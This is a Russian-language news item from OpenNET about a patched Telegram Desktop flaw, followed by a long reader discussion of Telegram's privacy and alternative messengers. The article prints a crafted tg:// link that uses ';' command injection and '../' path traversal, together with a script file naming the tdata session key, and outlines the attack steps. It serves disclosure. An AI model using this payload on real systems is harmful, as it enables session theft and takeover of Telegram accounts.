Профиль: Аноним (вход | регистрация) неRU opennet.me  
OpenNET

[ новости /+++ | форум | теги |    ]

Уязвимость в Telegram Desktop, позволяющая отправить произвольные файлы при клике на ссылку

09.10.2026 10:49 (MSK)

Раскрыты подробности и метод эксплуатации уязвимости (CVE-2026-107181) в Telegram Desktop, официальном клиенте Telegram для настольных систем. Проблема вызвана отсутствием должной обработки неэкранированных символов-разделителей в командах IPC, что позволяло при клике на отправленную ссылку организовать передачу атакующему любых файлов с системы жертвы, включая файлы с сессионными ключами, которые можно использовать для захвата учётной записи в Telegram. Уязвимость устранена в выпуске Telegram Desktop 7.2.9.

При клике на ссылках "tg://" операционная система запускает связанное с данным типом ссылок приложение Telegram Desktop. Если в системе уже запущен другой экземпляр данного приложения, то запущенный процесс передаёт ему ссылку через сокет при помощи IPC-интерфейса. Проблема в том, что если указать символ ";" среди параметров ссылки (например, "tg://x?a=1;OPEN..."), содержимое разделяется и идущие после символа ";" части обрабатываются как отдельные команды.

Для совершения атаки задействована команда OPEN вместе с URI-схемой "interpret:", предназначенной для запуска служебных сценариев через IPC, которые использовались для автоматической отправки новых релизов в каналы. Сценарий предоставляет собой предопределённый локальный файл, в котором указан отправляемый в канал файл и идентификатор канала. Файловый путь к сценариям обрабатывается относительно служебного подкаталога, но из-за отсутствия чистки "../" в файловых путях атакующий имеет возможность обратиться к файлам, сохранённым за пределами базового каталога. Например, можно загрузить файл в свою telegram-группу, после чего сослаться на это файл как на сценарий, подготовив ссылку типа:


   tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt

Этапы проведения атаки:

  • Атакующий добавляет жертву в свою группу (при настройках по умолчанию добавление не требует подтверждения от добавляемого) и отправляет в эту группу текстовый файл, в котором указан канал и путь к сценарию. Telegram сохранит этот файл в предопределённый системный подкаталог при заходе жертвы в группу.
    
       channel: 2005234537
       file: tdata/D877F783D5D3EF8Cs
    
  • Атакующий присылает жертве невинно выглядящую ссылку на свой хост (например, "https://coolsite.org"), которая при открытии через перенаправление на сервере атакующего заменяется на URI вида 'tg://x?a=1;OPEN:interpret:...;OPEN:interpret:...".
  • При клике по ссылке браузер вызывает обработчик URI "tg://", запускающий вышеотмеченную цепочку запуска команд, которая приводит к отправке файлов к канал атакующего без вывода каких-либо уведомлений и без запроса подтверждения отправки.
  • Получив файлы из подкаталога tdata c ключами шифрования и авторизации, при отсутствии выставленного пользователем локального пароля атакующий может клонировать сеанс подключения жертвы на своём устройстве.


  1. Главная ссылка к новости (https://beaksec.github.io/post...)
  2. OpenNews: Неофициальный Telegram-клиент Nekogram отправлял номера телефонов боту разработчика
  3. OpenNews: В Telega, альтернативном клиенте Telegram, выявили возможность совершения MITM-атаки
  4. OpenNews: Мэйнтейнеры Fedora и Gentoo отказались от сопровождения пакетов с Telegram Desktop
  5. OpenNews: GPL-код из Telegram взят мессенджером Mail.ru без соблюдения GPL
  6. OpenNews: Неофициальный Telegram-клиент MobonoGram 2019 оказался троянским ПО
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/66431-telegram
Ключевые слова: telegram
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (73) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 12:00, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    А что СМС-подтверждение из телеги ещё приходит?
     
     
  • 2.16, Аноним (16), 12:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Да, но очень просит купить премиум за 500 форинтов, а то "дорого очень смс слать" (веб версия при этом логинится без каких либо проблем и смс)
     
     
  • 3.20, Аноним (1), 13:12, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Логинится в существующую учетку, а если новый заводить, смс уже не требует, сомнительно.
    Во многих странах смс это средство идентификации и защиты от ботов.
     
     
  • 4.23, Аноним (23), 13:29, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Ага, только не помогает это, можно одноразовые номера за копейки покупать во многих странах. Включая Россию, кстати, несмотря на все законы о запретах анонимных симок. Но требовать платить это ужасное решение, конечно, они просто жадные. Были бы адекватнее, поставили бы какую-нибудь капчу вместо этого. Не цифры или выбор квадратиков, естественно, это уже легко ботами проходится, а что-то вроде сравнения форм фигур, частей паззлов и подобного, это пока может защитить
     
     
  • 5.34, lbccom (??), 13:58, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    >> Ага, только не помогает это, можно одноразовые номера за копейки покупать во многих странах

    сомнительное заявление

    но смс выглядит лучше, чем обязательная завязка на частные сервисы appla/googla/ms/vk

     
  • 2.26, Аноним (26), 13:31, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    >  А что СМС-подтверждение из телеги ещё приходит?

    У них для особо паскудных локаций и другие варианты есть :)

     

  • 1.2, No Name (?), 12:03, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +8 +/–
     

  • 1.3, Аноним (10), 12:03, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/–
    Няшные диаграммы.
     
  • 1.4, Аноним (4), 12:07, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +6 +/–
    ну вроде работает как и задумывали, чо чинить то
     
  • 1.6, Аноним (6), 12:12, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/–
    Открыть Телеграм, увидеть 7.2.9, закрыть Телеграм.
     
  • 1.9, Аноним (10), 12:20, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/–
    Зачем эта спайварь когда есть веб морда?
     
     
  • 2.12, limafresh (ok), 12:41, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    В чём конкретно он "спайварь"? Докажите. И он нужен, потому что Qt даёт нативный опыт и быстродействие, а веб медленный. Для тех, кто редко пользуется, сойдёт, но для остальных нет.
     
     
  • 3.17, Нил Нонэниевич (?), 13:00, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • –2 +/–
    Без аудита любой кусок софта - потенциальная спайварь.
     
     
  • 4.24, Аноним (23), 13:30, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +2 +/–
    Он с полностью открытым кодом, бери и аудируй
    https://github.com/telegramdesktop/tdesktop
     
     
  • 5.51, Нил Нонэниевич (?), 15:20, 09/10/2026 Скрыто ботом-модератором     [к модератору]
  • –1 +/–
     
  • 3.72, Аноним (72), 17:53, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    Дурову доверять себя не уважать. Этот же Дуров на всех углах рассказывал это приватно и безопасно в отличии от всяких там Вацапов а потом для регистрации начали требовать номер сотового а потом не просто номер а ещё и наличие умнофона с Android либо iOS. Сливание номера тилипона, контактов из адресной книжки конечно способствую безопасности.
     
     
  • 4.75, Аноним (75), 18:00, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    а главное всю переписку пользователей продал елону шмаксу для "тренировки" ЫЫ :)
     
  • 2.14, timur.davletshin (ok), 12:47, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • –5 +/–
    А уэб-морда и является Desktop версией, которая рисуется Electron'ом.
     
     
  • 3.15, limafresh (ok), 12:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +5 +/–
    Зачем так нагло врать? Telegram Desktop написан на Qt, а не является веб-обёрткой, в отличие от многих.
     
     
  • 4.32, timur.davletshin (ok), 13:45, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +7 +/–
    Вы правы, приношу извинения. Пользовался пару раз и сложилось впечатление, что идентичен Web-морде. Я ошибся. Плюсик за исправление.
     
     
  • 5.35, limafresh (ok), 14:03, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    Принимаю, спасибо
     
     
  • 6.38, timur.davletshin (ok), 14:38, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/–
    > Принимаю, спасибо

    Принимает он. Положи чужое извинение туда, где взял. Не тебе оно, а Telegram предназначалось. Твоя только благодарность за исправление )))

     
     
  • 7.52, limafresh (ok), 15:21, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    Как скажете
     
  • 7.68, Аноним (68), 17:37, 09/10/2026 Скрыто ботом-модератором     [к модератору]
  • +/–
     
  • 3.55, Аноним (55), 15:41, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > А уэб-морда и является Desktop версией, которая рисуется Electron'ом.

    Вот прям со всем ее Qt? Вы там протрезвейте до того как писать на форум.

     
     
  • 4.59, timur.davletshin (ok), 15:57, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > Вот прям со всем ее Qt?

    https://try.qt.io/projects/oxyscan - Why not?

     
     
  • 5.60, timur.davletshin (ok), 15:59, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    >> Вы там протрезвейте до того как писать на форум.

    Пока ты очухался, я уже и проспаться успел.

     
  • 2.27, Аноним (26), 13:33, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    >  Зачем эта спайварь когда есть веб морда?

    Эта спайварь в принципе даже так то открытая. Другое дело что серваки самодурова - метаданные гребут разумеется лопатой. И еще каким-то AI и хрен знает чему еще скармливают потом оптом.

     

  • 1.11, Аноним (11), 12:39, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    >Уязвимость устранена в выпуске Telegram Desktop 7.2.9

    https://github.com/telegramdesktop/tdesktop/

     
  • 1.18, Метрика (?), 13:06, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/–
    Телега такая телега, а если серьезно анонимный мессенджер с регистрацией по номеру телефона, это сюр...

    Для безопасности нужен мессенджер P2P по типу Gnutella только не для файлов, а для сообщений, но такого конечно не будет, ведь как тогда ваши переписки читать

     
     
  • 2.25, фф (?), 13:31, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    поднимите свой jabberd, и юзайте абсолютно анонимный xmpp безо всяких смс регистраций
    не хотите xmpp? есть еще анонимне - smtp, можно даже свой сервер не поднимать - protonmail телефон не спрашивает. + почту можно шифровать вполне стандартным почтовым клиентом - тогда даже админы сервера не увидят чего вы пишете.
    Анонимности тогда будет мешать ваш ip, но тут можно воспользоваться впн, правда там уже тоже спрашивают номер телефона (ну или аккаунт телеграмма, который привязан к номеру), кажется круг замкнулся.
    вот только по-моему и телеграм обещал приватность,а не анонимность. Хотя тут возможно я чего пропустил, спорить не буду.
     
     
  • 3.28, Аноним (26), 13:34, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > поднимите свой jabberd, и юзайте абсолютно анонимный xmpp безо всяких смс регистраций

    Или качаете любой клиент Tox - и скипаете историю с сетапом своего сервака, трахом с регистрацией доменов, какими там еще записями DNS и что там еще за аций кластерфак.

     
     
  • 4.46, Аноним (46), 15:11, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Современные клиенты позволяют прописать айпишник сервака и привязаться к самоподписному сертификату (который даже "протухший" будет работать, т.е. одноразовая настройка). Файловый сервер так же работает внутри xmpp чисто с айпишниками и даже без https. Jingle вообще как обычный ICE работает, там даже поддержка сервера не нужна т.к. это p2p тема между звонящими, и если всё завёрнуто в впнку (а не завёртывать при отсутствии своей DNS зоны смысла нету) то проблем с p2p звонками не будет никогда, никакие TURN прокси поднимать не нужно.
     
     
  • 5.56, Аноним (-), 15:48, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    А вон то - просто работает Без вот всего этого кластерфака Ну то-есть совсем ... большой текст свёрнут, показать
     
     
  • 6.61, nuclight (??), 16:08, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    А кто именно такое это самое "вон то"?
     
     
  • 7.69, Аноним (-), 17:46, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > А кто именно такое это самое "вон то"?

    Tox и некоторые иные p2p на тему. Там оно жить будет столько сколько надо тому кто это засетапил. Забыв 3rd parties спросить "а можно ли".

    Ни у каких 3rd party никакого особого контроля над происходящим нет. А по приколу в локалке сие живет даже если внешка совсем отвалилась.

     
  • 3.49, Метрика (?), 15:17, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/–
    В P2P ничего поднимать не нужно, серверов нет, точек отказа тоже, загуглите про DHT хотябы
     
     
  • 4.57, timur.davletshin (ok), 15:50, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    DHT bootstrap уже не является проблемой? Блокируешь домены по пальцам руки и нету вашего DHT.
     
     
  • 5.70, Аноним (-), 17:50, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > DHT bootstrap уже не является проблемой?

    Сильно меньшая проблема. К тому же клиенты кешируют потом кучу узлов и вон то как-то импакит только совсем новых клиентов разве что.

    > Блокируешь домены по пальцам руки и нету вашего DHT.

    Совсем не факт. Тот же tox если что и через tor/vpn/socks-like на ура прицепится. Да и свой бутстрап поставить - СИЛЬНО проще. Т.е. буквально запустить одну программу, она автоматически сгенерит ключи, никаких доменов и проч не надо. Все что надо это знать для пуска с толкача triple IP:port:DHTKEY - и оно завертится.

    Но реально оно и еще в локалке допустим ищет клиентов. Если кто уже был в сети - оно через него вылезет. И часть узлов с него подтащит. И опять же завертится. И суммарно эффективная удавка этого - никак не "пару доменов".

     
  • 2.29, Аноним (11), 13:35, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +2 +/–
    >а если серьезно анонимный мессенджер с регистрацией по номеру телефона, это сюр

    А где-то декларируется, что он анонимный ?

    Сигнал тоже просто пишет про приватность или конфиденциальность, а не анонимность:
    https://signal.org/ru/

     
     
  • 3.31, Аноним (26), 13:36, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > Сигнал тоже просто пишет про приватность или конфиденциальность, а не анонимность:

    Это те красавы у которых - тадам - их core либа которую всем сватали - была с фееричнейшей дырой в этом самом шифорвании так что приватность и конфиденциальность шли туда же куда и слоны, крупным оптом? Но немамонт и второй раз джентльменам на слово поверит.

     
     
  • 4.33, Аноним (11), 13:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Чего?
    «Signal Protocol» много кто использует:
    https://en.wikipedia.org/wiki/Signal_Protocol
     
     
  • 5.71, Аноним (-), 17:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > Чего?
    > «Signal Protocol» много кто использует:
    > https://en.wikipedia.org/wiki/Signal_Protocol

    А фееричная дыра в дефолтовой криптолибе сватаемой всем по моему как раз у именно signal была. Так что все кто юзал ту либу - залетчики: там полный слом end to end crypto.

     
  • 2.40, Ilya Indigo (ok), 14:49, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    С какого это бадуна телега стала или была ананимным мессенджером?
    Вот это сюр!
     
     
  • 3.53, аниме эксперт (?), 15:27, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +2 +/–
    Павло Де Дур ее пиарил как продукт который уважает privacy, типа лучше воцап и т.д. По факту тг это ханипот для спецслужб. Собственно, они и не скрывают, что сотрудничают со всеми. А то что сообщения хранятся на сервере (в отличие от того же воцапа) - ред флаг для любого человека, у которого iq выше хлебушка.
     
     
  • 4.54, Аноним (54), 15:38, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Правильно, у высокоразвитых представителей хомо сапиенс переписька должна мгновенно удаляться. Желательно до того, как её кто-то прочтёт. В том числе и отправитель, который это пишет.
     
  • 4.63, nuclight (??), 16:10, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/–
    Точно, любой IMAP-сервер теперь тоже редфлаг! Соввсем анонимы кукухой поехали...

    Хранение сообщений на сервере - это норма для качественного продукта XXI века, а все эти ваши просто как обычно маскируют "мы не умеем" под "безопасность" (ага, как стадо OpenBSD).

     
     
  • 5.74, Аноним (-), 17:57, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > Точно, любой IMAP-сервер теперь тоже редфлаг! Соввсем анонимы кукухой поехали...

    Ну а что это? Типов которые смогут поставить и захотят свой почтарь ставить нынче осталось - мизер. Их можно хоть поименно перечислить на 1 листочке бумаги на всю страну.

     
  • 5.77, зайчаток_разума (?), 18:07, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    IMAP подразумевает удаление сообщений из хранилища. Сообщения могут быть зашифрованы.

    Совсем реганутые реганулись. =) Сравнивать сервера на стандартных протоколах с проприетарными сервисами. Там уже не пресловутый хлебушек. Там только нитка, которая уши держит. =)

     
  • 4.65, Ilya Indigo (ok), 16:19, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > продукт который уважает privacy

    Продукт который УВАЖАЕТ приватность, это не то что НЕ анонимный, он даже НЕ безопасный!
    Противоричие в словах Пабло дэ Балоболуа, конкретно в этом, нет!
    Вы путаете тёплое с красным!

     
  • 3.58, timur.davletshin (ok), 15:52, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Плюсую. Протестующих в Ю. Корее в своё время хорошо и нехитро задеанонимизировали.
     

  • 1.21, ИмяХ (ok), 13:16, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    >>отсутствия чистки "../" в файловых путях

    Опять небезопасный язык виноват

     
     
  • 2.30, Аноним (26), 13:35, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > Опять небезопасный язык виноват

    Английский наверное. На нем большая часть небезопасных программ были написаны, безобразие!

     
     
  • 3.41, Жироватт (ok), 14:59, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    1С: Бухгалтерия - очень безопасная программа...

    Даёшь 1С:ТелеГрам на свежей версии 1С 8.5+!

     
     
  • 4.73, Аноним (-), 17:55, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    > 1С: Бухгалтерия - очень безопасная программа...
    > Даёшь 1С:ТелеГрам на свежей версии 1С 8.5+!

    Пока смогли только в Там-Там какой-то. И тот подозрительный. А 1C настолько безопасный что вон те безопаснички (которые попутно список критичных ДЦ любезно перечислили) - жалуются что росгосжандаарм загасил и это тоже. Так что в рунете приходится половину филиалов через квн пхать просто потому что пров порты блокнул совсем и 1С подох.

    Да, и централизованные огромные дц это тоже классно придумало. Их так удобно цензурить. Казалось бы что может пойти не так... ах, "точки отказов", грите? У вас там статью за дискредитацию ДЦ и топологий сети еще не ввели?

     

  • 1.22, Alexey Torgashin 2 (?), 13:16, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • –1 +/–
     
     
  • 2.37, Аноним (54), 14:21, 09/10/2026 Скрыто ботом-модератором     [к модератору]
  • +/–
     
  • 2.42, Жироватт (ok), 15:00, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Не, дружочек, там уже место для тебя зарезервировано.
    Даже табличка стоит уже. С твоим ником
     

  • 1.36, Аноним (36), 14:18, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    Забавная у них 7.3.0 версия. Точне чейнджлог к ней:

    * Money

    :D

     
  • 1.39, Ilya Indigo (ok), 14:44, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/–
    > при отсутствии выставленного пользователем локального пароля

    Имеется ввиду парольная 2FA после смс?

     
     
  • 2.47, Анонимный Ананас (?), 15:11, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +2 +/–
    Нет, именно локальный пароль при запуске клиента телеги.
    Тогда ее запустить не смогут на другом ПК не зная его.
     
  • 2.48, Аноним (46), 15:14, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    Имеется ввиду тот бесполезный пароль на морде самого приложения, который буквально локальный.
     
     
  • 3.64, nuclight (??), 16:11, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/–
    Как это бесполезный, им локальные ланные шифруются.
     

  • 1.44, Tron is Whistling (?), 15:03, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/–
    "если указать символ ";" среди параметров ссылки"
    Однако. Это ошибка разряда младшего школьника.
     
     
  • 2.45, Аноним (36), 15:10, 09/10/2026 [^] [^^] [^^^] [ответить]  
  • +/–
    Есть подозрение, что его и пишет школота, потому что часто такие ошибки всплывают (а потом и в чейнджлоге), что диву даешься.
     

  • 1.50, Аноним (46), 15:17, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    > Для совершения атаки задействована команда OPEN вместе с URI-схемой "interpret:", предназначенной для запуска служебных сценариев через IPC, которые использовались для автоматической отправки новых релизов в каналы.

    Это и подобные вещи должны быть под галочкой "я продвинутый админ локалхоста, я хочу чтобы скрипт на питоне имел доступ к клиенту".

     
  • 1.62, Аноним (62), 16:08, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +1 +/–
     
  • 1.66, Аноним (66), 16:30, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +/–
     
  • 1.67, Аноним (67), 16:39, 09/10/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
  • +/–
     
  • 1.76, Аноним (72), 18:05, 09/10/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/–
    Надо переписать на Rust ытоб была безопасность. Никакой другой язык безопасности не гарантирует.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    XSQUARE
    Inferno Solutions
    Hosting by Hoster.ru
    Хоcтинг: